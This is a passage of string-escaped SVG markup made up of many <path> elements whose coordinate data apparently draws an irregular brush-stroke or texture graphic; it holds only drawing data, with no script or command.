d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path 